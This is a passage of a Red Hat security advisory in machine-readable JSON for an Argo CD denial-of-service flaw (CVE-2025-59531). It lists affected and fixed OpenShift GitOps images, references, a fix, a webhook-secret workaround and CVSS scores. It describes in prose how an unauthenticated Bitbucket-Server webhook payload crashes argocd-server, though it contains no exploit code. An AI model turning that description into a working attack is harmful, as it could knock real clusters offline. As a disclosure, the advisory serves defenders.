"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400935"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability was identified in the Argo CD continuous delivery tool, which is distributed as part of Red Hat GitOps product. An unauthenticated attacker can exploit this flaw by sending a specially crafted request to the Application Programming Interface (API) webhook endpoint. This action causes the API server to crash, preventing it from restarting properly. By repeatedly targeting the server, an attacker can cause a complete service outage, making the Argo CD interface unavailable to all users. This vulnerability is only exposed in configurations where a specific webhook secret has not been set.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: argocd-server: gitops: Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability was rated as Important by the Red Hat Product Security team, this happens because an unauthenticated attacker is able to cause a denial of service from the whole GitOps cluster. This vulnerability affects only clusters without a configured \u0027webhook.bitbucket.secret\u0027 configuration key, thus clusters that have this option configured are not exposed to this flaw.\n\nThis vulnerability lies in a unsafe cast when trying to retrieve the `repository.links.clone`JSON field from BitBucket-Server push request. When the unsafe cast is triggered, the goroutine created by the worker to process the request will fail within an assertion panic and, as it lacks a recovery routine, the whole argocd-server binary will be terminated. If an attacker manages to force all the argocd-server replica nodes to reach this assertion failure, a Denial of Service of the whole cluster will happen.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-59531"
},
{
"category": "external",
"summary": "RHBZ#2400935",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2400935"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-59531",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59531"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59531"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f",
"url": "https://github.com/argoproj/argo-cd/commit/5c466a4e39802e059e75c0008ae7b7b8e842538f"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-f9gq-prrc-hrhc"
}
],
"release_date": "2025-10-01T20:49:35.428000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-15T10:27:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:18093"
},
{
"category": "workaround",
"details": "If a BitBucket repository is being used by GitOps it\u0027s possible to mitigate this vulnerability by setting up a BitBucket webhook secret to ensure only trusted parties can access the webhook endpoint.\n\nIn case BitBucket is not being used, the user can set the webhook secret to a long random value to prevent the webhook from being called:\n\n~~~\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.bitbucketserver.secret: \u003cyour base64-encoded secret here\u003e\n~~~",
"product_ids": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:bd3eb63c087dbd5f807b9e7cf680c0de1c3408dd9f12b7eb6e98f8221ca28a8f_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:e2fdaac8c55eefe25f63c0742f8bd14066abb33b7a5f746157fad65b5b99d092_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:049800b51d49a8f5320ed013eea46695eb7f0eeee26459f18a51f5d1023e6a8c_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:05de1e5e8aeb9bbaab90f03fd3cf1746bc79053de779c45ab850f5592f29e094_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:9c79c05230debdba71ef6cefc26e39b0a5134fbe00aad9ce667c277aa8e34228_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:a424e822277befdf5d414c5aa5e1f5e359d56c5e9fc5da02e451a59244559966_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:5fb796a21d73e4baf25c8a116c69447ef0d5de6db86b0e3b65df68373f4b10d0_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:82b5c2760800ab618b4d1fbd7e713765181f57123636ecb34d0f700af5b64945_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e9197abd503e4a97ef55984334e4d0de594d3b9a5e542bbe475322f966b8fefd_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f8f99349426e5ab977acdda440c22e5d04187ca43e05f91c8b5bbb823eaf59f6_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2cfd5c1921d34fe92c312d0929599207266c0b14207b987edda7eb838728e554_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:2fa4d567a4de620a81f1678596b74fa9bcb3dd060e71549917e819ef4b5a80f0_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:3a250c6cf16f5676d412f11d48ca6e84f5681c899ed75c8248e6dd0184bdcc5d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:d2d1a76ff456e08e2b217aa01530b7f6b9fb91c40388cee14c0df77245ac5789_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:67069d6db9ef08a8653964aa24a13a97da97f2238210dbdb085988014f77e990_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:a5bd0b0d1677ffc3b4117082a91588316d5f4cefba1265051cbad07856f99969_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:d9b83dd9c9a3a76315a830cb1e995964e697dc025b1d552d1e5bf6acd94f7186_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f988a63f8f11e2cbfef19c9d02905a69daf783ac05e6e9c042f13c697e87479a_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:1d6f9b5cdf776ef51e96e738f726d3dd797304ab44bc313ded7a6d280fe12a95_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:73cbdb023ab9abf39602b4a15f9a68515aad37c14a1bbff060b906570ab9d2c3_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:b0408f958ef20c3f6230d392049b261ebfbd50f5f8e5b0e9776b20726fc9c83a_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:cc5b889fa32b5476f29a9d36eb28de80c4288cbf366e86a3aa82fb4a6993b63b_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:2cb3b46616a69b95620a59b43e9aadbe02e98b984434d1a47410a603de4d1598_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:d84d629b8e7e99fca60a227053ea4aae2ada53e1720ad928ebc627465e99b9a8_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e03a5803646011ab083c958f52f8f9d7c8025572e95f522768d260961c72469c_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:e7561d1e7e220cca0cabb9e28a7a9594a1cebf771546382e6302c98a79d82e7e_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:22f95edd885609dfbf1b606fc5d41f2efa5361cbec1f1918e5d774a030779ea0_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94793fe05dede5787dacf889f6e51e9385d3b312e7500514f88ea6fa608b0089_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:dafab1379d8bf3af9d2794a5d249901a4d045b7ee1e129669001b922ccdc9f98_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:df33bf847baaeff2432a5e2e22853a89cd15fd8a3f14cabc233b38d3e9dcacc4_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:7f9756472d19ba870990b7348cd693dc850d333ae2202d56dbdf9d7dd0ff01bb_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:cc6ca27fa4823083354c3879efb3a2733f377965528fda892cf1aa7823cc35ea_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:eb5cfcb3d2da257dcac23086cdef0e16487885c14badf5577f36c22b6e9a7d43_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f20831b8df3104e7ae3e147ea3df202433d0f20e6b1bfb1259fe71bae8f9c2b5_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:a27b8dd047e10fbbd6fc49176036c9b5178a1d2841e26719bfde23239ede157d_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:702e2376cbe077fd68686ab54f25be3d2b87696b1cf956c48465f609b97fff8e_arm64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:87bcc0a5bc2f67d609161d346d3fee760b292db0dac42ef7393dad2054700257_ppc64le",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a2d7c119c287bc7ab8751d4435b7e80749618abf4d98a2704a3f786d239dc86d_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:b756f5cd7270e033a99c1c90c7e63567ee88f40f41764bf35573528d8a275eae_amd64",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b0369e0bddef1a52941482bfbe88f72674de51dfcc7f30ddb98b410476ae4785_s390x",
"Red Hat OpenShift GitOps 1.18:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b8f986a933e626883b0bf03fdf253ce4c74d82931342ede909324de1da1ae327_amd64",
